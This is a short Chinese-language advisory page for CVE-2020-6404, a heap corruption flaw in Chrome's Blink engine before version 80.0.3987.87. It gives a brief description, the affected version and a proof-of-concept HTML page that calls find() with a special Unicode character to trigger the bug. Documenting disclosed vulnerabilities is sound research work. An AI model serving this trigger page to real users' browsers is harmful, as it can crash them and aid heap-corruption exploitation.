（CVE-2020-6404）Google Chrome Blink 缓冲区错误漏洞
===================================================

一、漏洞简介
------------

在80.0.3987.87之前的Google
Chrome中，Blink中的不当实现使远程攻击者有可能通过精心制作的HTML页面利用堆破坏。

二、漏洞影响
------------

Google Chrome 80.0.3987.87

三、复现过程
------------

### poc

    <!DOCTYPE html>
    <head>
    <script type="text/javascript">
    document.addEventListener("DOMContentLoaded", function(){
    find(decodeURIComponent('\uFFFC'));
    });
    </script>
    </head>
    <body>
    <legend></legend>
    </body>
    </html>

![](./.resource/(CVE-2020-6404)GoogleChromeBlink缓冲区错误漏洞/media/rId25.png)